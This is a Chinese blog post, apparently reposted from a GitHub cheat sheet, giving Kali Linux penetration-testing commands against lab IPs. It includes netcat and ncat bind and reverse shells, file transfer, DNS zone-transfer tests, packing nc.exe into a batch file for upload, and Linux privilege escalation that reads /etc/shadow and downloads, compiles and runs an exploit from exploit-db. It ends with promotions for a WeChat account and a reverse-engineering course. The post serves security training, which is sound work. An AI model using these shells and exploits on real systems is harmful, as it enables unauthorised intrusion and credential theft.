kali作为一个渗透测试者最受欢迎的操作系统,集成了非常多的安全工具,让渗透测试人员更方便的做一些渗透测试工作,本文来自国外某位大神的github,在这里给大家做一个分享,具体内容如下:
Netcat
netcat是一个优秀的网络工具,在业界有“瑞士军刀”的美誉,通常在Linux系统下都自带了。
测试环境
Kali 192.168.2.10
Windows 192.168.2.12
聊天
Windows nc -nlvp 4444
Kali nc -nv 192.168.2.12 4444
正向shell
Windows nc -nlvp 4444 -e cmd.exe
Kali nc -nv 192.168.2.12 4444
反向shell
Windows nc -nlvp 4444
Kali nc -nv 192.168.2.12 4444 -e /bin/bash
文件传输
Windows nc -nlvp 4444 > incoming.exe
Kali nc -nv 192.168.2.12 < /usr/share/windows-binnaries/wget.exe
Ncat
Ncat是nmap工具集的一部分,使用如下命令使用Ncat生成一个正向shell:
Windows ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl
Linux ncat -nv 192.168.2.12 4444 --ssl
tcpdump
tcpdump是Linux下一个网络包截取分析工具。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。
读取数据包文件
tcpdump -r <capture.pcap>
指定源IP获取数据包文件中的数据
tcpdump -n src host 192.168.2.10 -r <capture.pcap>
指定目的IP获取数据包文件中的数据
tcpdump -n dst host 192.168.2.12 -r <capture.pcap>
指定端口获取数据包文件中的数据
tcpdump -n port 443 -r <capture.pcap>
读取数据包文件并且以16进制显示
tcpdump -nX -r <capture.pcap>
利用host获取dns信息
host是一个用来执行dns查找的小工具。
枚举dns信息
host -t <type> target.com
mx = mail server
ns = name server
测试dns域传送
host -l target.com <DNS server>
###EXE转bat
在某些特殊的情况下需要将exe转为bat,便于上传并执行,下面就是如何使用kali将exe转为bat。
cp /usr/share/windows-binaries/nc.exe /root/
cp /usr/share/windows-binaries/exe2bat.exe /root/
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
Linux本地提权
在获得一个webshell之后,一般权限为apache权限,想要进一步的渗透测试需要将自己的权限提升到最高,下面是在Linux下提权使用命令。
ssh user@<target IP>
id # 显示用户和组的权限
cat /etc/shadow # 保存的用户的密码,只有root权限可以查看
cat /etc/issue # 查看系统版本信息
uname -a
如何下载并执行提权exp:
wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o exploit exploit.c # 编译
./exploit # 执行
id # 查看是否提权成功
cat /etc/shadow # 读取用户密码
总结
这个文章其实有点不想发,但是又没有好文章给大家分享,所以就凑合着给大家看看,毕竟不想浪费今天发文的机会,大家有好的文章不要藏着掖着,发给我有好礼相送呦。最后祝大家国庆节快乐,在玩的同时也别忘了学习呀!
有兴趣可以关注一下我的微信公众号 【信安之路】 基本保持每天一篇新鲜的文章,可以及时在手机上阅读,目前公众号上百篇文章,以渗透测试为主。
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)